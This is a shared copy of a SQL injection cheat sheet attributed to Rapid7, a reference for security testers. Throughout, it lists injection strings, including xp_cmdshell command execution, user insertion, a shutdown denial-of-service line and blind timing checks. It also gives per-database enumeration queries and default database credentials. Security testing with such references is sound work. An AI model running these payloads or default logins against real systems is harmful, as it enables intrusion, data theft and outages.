
R7 SQL - Injection - Cheat - Sheet.v1 PDF

This document provides a cheat sheet of common SQL injection commands that can be used to discover information about and attack backend databases like Microsoft SQL Server, Oracle, IBM DB2, and MySQL. It lists commands to retrieve the database version, list users, tables, columns, the current user, add a new user, cause denial of service, and more. The summary also includes some common default usernames and passwords for different database systems.

Uploaded by Alhadi

Common SQL Injection Commands for Backend Databases

SQL INJECTION CHEAT SHEET

www.rapid7.com

SQL Injection Discovery

Common SQL Injection Attack Strings
Query syntax breaking: Single Quote ('), Double Quote (")
Injection SQL comment: Hyphens (--), Hash (#), Comment (/*)
Extending/Appending queries: Semicolon (;)
Injecting/Bypassing filters: CHAR(), ASCII(), HEX(), CONCAT(), CAST(), CONVERT(), NULL

Common SQL Injection Commands
Injecting Union: Union all select NULL (Multiple columns)
Running Command: 1;exec master..xp_cmdshell dir>C:\inetpub\wwwroot\dir.txt OR master.dbo.xp_cmdshell
Loading Files: LOAD_FILE(), User UTL_FILE and utfReadfileAsTable
Adding user: 1; insert into users values(nto,nto123)
DoS: 1;shutdown
Fetching Fields: select name from syscolumns where id =(select id FROM sysobjects where name = target table name) (Union can help)

Common Blind SQL Injection Commands
Quick Check: AND 1=1, AND 1=0
User Check: 1+AND+USER_NAME()=dbo
Injecting Wait: 1;waitfor+delay+0:0:10
Check for sa: SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115
Looping/Sleep: BENCHMARK(TIMES, TASK), pg_sleep(10)

Default Usernames/Passwords
Oracle: scott/tiger, dbsnmp/dbsnmp
MySQL: mysql/<BLANK>, root/<BLANK>
PostgreSQL: postgres/<BLANK>
MS-SQL: sa/<BLANK>
DB2: db2admin/db2admin

MS-SQL
Grab version: @@version
Users: name FROM master..syslogins
Tables: name FROM master..sysobjects WHERE xtype = U
Database: name FROM master..sysdatabases;
Columns: name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = <TABLENAME>)
Running User: DB_NAME()

Oracle
Grab version: table v$version compare with Oracle%
Users: * from dba_users
Tables: table_name from all_tables
Database: distinct owner from all_tables
Columns: column_name from all_tab_columns where table_name=<TABLENAME>
Running User: user from dual

IBM DB2
Grab version: Versionnumber from sysibm.sysversions;
Users: user from sysibm.sysdummy1
Tables: name from sysibm.systables
Database: schemaname from syscat.schemata
Columns: name, tbname, coltype from sysibm.syscolumns
Running User: user from sysibm.sysdummy1

MySQL
Grab version: @@version
Users: * from mysql.user
Tables: table_schema,table_name FROM information_schema.tables WHERE table_schema != mysql AND table_schema != information_schema
Database: distinct(db) FROM mysql.db
Columns: table_schema, column_name FROM information_schema.columns WHERE table_schema != mysql AND table_schema != information_schema AND table_name == <TABLENAME>
Running User: user()

PostgreSQL
Grab version: version()
Users: * from pg_user
Database: datname FROM pg_database
Running User: user;
